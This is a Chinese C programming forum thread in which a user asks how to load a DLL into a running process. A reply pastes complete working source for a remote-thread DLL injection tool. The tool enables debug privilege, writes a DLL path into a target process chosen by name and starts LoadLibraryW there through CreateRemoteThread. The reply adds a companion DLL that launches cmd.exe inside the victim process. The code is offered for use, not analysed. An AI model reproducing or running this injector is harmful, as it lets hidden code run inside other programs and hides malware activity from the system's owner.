[求助]小弟想问问如何将DLL文件加载到一个已知进程里！谢谢！ - C语言论坛

得分:0

这种玩意网上多得是，自己找找.

// win2000 + vc6 #include<windows.h> #include<process.h> #include<stdio.h> #include<conio.h> #include<stdlib.h> #include<string.h> #include<ctype.h> #include<tlhelp32.h> //-------------------------------------------- char lpszCurPath[MAX_PATH]; char ProcName[MAX_PATH]; HANDLE hSnapshot; PROCESSENTRY32 ProcEntry; DWORD RmtProcPid; HANDLE hRemoteProcess; HANDLE hRemoteThread; HANDLE hProcessToken; HANDLE hProcess; PROCESS_INFORMATION procinfo; STARTUPINFO startinfo; WCHAR * pwStr; int nLen; PWSTR lpszRmt; PTHREAD_START_ROUTINE pfnAddr; int status,i; FILE * fp; //-------------------------------------------- BOOL SetPrivilege(HANDLE, LPCTSTR, BOOL); //-------------------------------------------- void main(int argc, char * argv[]) { printf("\n"); printf(" **********************************************\n"); printf(" * *\n"); printf(" * Process Inject (Personal) *\n"); printf(" * By abettor@mail.china.com *\n"); printf(" * QQ:41018203 *\n"); printf(" * *\n"); printf(" **********************************************\n"); printf("\n This program can help you to inject a thread to a remote process .\n"); printf("\n\tUsage : %s Name_Of_Process_To_Bind\n", argv[0]); if(argc != 2) { printf("\nPress any key to continue ..."); _getch(); printf("\n\nProcess list below :\n"); hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,(ULONG)NULL); ProcEntry.dwSize=sizeof(ProcEntry); Process32First(hSnapshot,&ProcEntry); do { printf("\t%s\n", ProcEntry.szExeFile); }while(Process32Next(hSnapshot,&ProcEntry)); CloseHandle (hSnapshot); printf("\nPress any key to quit ..."); _getch(); exit(0); } fp=fopen("Your_Dll.dll", "rb"); if(! fp) { printf("\nLibrary file lost !\n"); exit(0); } fclose(fp); i=0; while(argv[1][i]) { argv[1][i]=tolower(argv[1][i]); ++i; } hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,(ULONG)NULL); ProcEntry.dwSize=sizeof(ProcEntry); Process32First(hSnapshot,&ProcEntry); do { strcpy(ProcName, ProcEntry.szExeFile); i=0; while(ProcName[i]) { ProcName[i]=tolower(ProcName[i]); ++i; } if( !strcmp(ProcName, argv[1])) { RmtProcPid = ProcEntry.th32ProcessID; hRemoteProcess=OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, RmtProcPid ); break; } }while(Process32Next(hSnapshot,&ProcEntry)); CloseHandle (hSnapshot); if(! hRemoteProcess) { printf("\nProcess is not found or cannot be opened !\n"); exit(0); } GetCurrentDirectory(MAX_PATH, lpszCurPath); strcat(lpszCurPath, "\\Your_Dll.dll"); pwStr=(WCHAR *)malloc(MAX_PATH); nLen=strlen(lpszCurPath); nLen=(nLen + 1) * 2; MultiByteToWideChar(CP_ACP, 0, lpszCurPath, -1, pwStr, MAX_PATH); status=OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken); if(! status) { printf("\nOpenProcessToken() error !\n"); exit(0); } status=SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE); if(! status) { printf("\nSetPrivilege() error !\n"); exit(0); } pfnAddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW"); if(! pfnAddr) exit(0); lpszRmt=(PWSTR)VirtualAllocEx(hRemoteProcess, NULL, nLen, MEM_COMMIT, PAGE_READWRITE); if(! lpszRmt) { printf("\nVirtualAllocEx() error !\n"); exit(0); } status=WriteProcessMemory(hRemoteProcess, lpszRmt, (LPVOID)pwStr, nLen, NULL); if(! status) { printf("\nWriteProcessMemory() error !\n"); exit(0); } hRemoteThread=CreateRemoteThread( hRemoteProcess, NULL, 0, pfnAddr, lpszRmt, 0, NULL ); if(! hRemoteThread) { printf("\nCreateRemoteThread() error !\n"); exit(0); } } //------------------------------------------------------------ BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege) { TOKEN_PRIVILEGES tp; LUID luid; if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid)) return FALSE; tp.PrivilegeCount = 1; tp.Privileges[0].Luid = luid; if (bEnablePrivilege) { tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; } else { tp.Privileges[0].Attributes = 0; } AdjustTokenPrivileges( hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES) NULL, (PDWORD) NULL); return TRUE; } /////////////dll代码然后再做一个dll： // Your_Dll.dll #include<stdio.h> #include<stdlib.h> #include<windows.h> #include<process.h> #define DLL_EXPORT __declspec(dllexport) //--------------------------------------------------------- STARTUPINFO startinfo; PROCESS_INFORMATION procinfo; char lpCmd[MAX_PATH]; //--------------------------------------------------------- BOOL APIENTRY DllMain (HINSTANCE hInstance, DWORD dwReason, PVOID pvReserved) { switch (dwReason) { case DLL_PROCESS_ATTACH: GetSystemDirectory(lpCmd, MAX_PATH); strcat(lpCmd, "\\Cmd.exe"); CreateProcess( lpCmd, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &startinfo, &procinfo ); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: default: break; } return TRUE ; }

九洲方除百尺冰，映秀又遭蛮牛耕。汽笛嘶鸣国旗半，哀伤尽处是重生。 -老K
治国就是治吏。礼义廉耻，国之四维。四维不张，国之不国。 -毛泽东

我用LoadLibrary~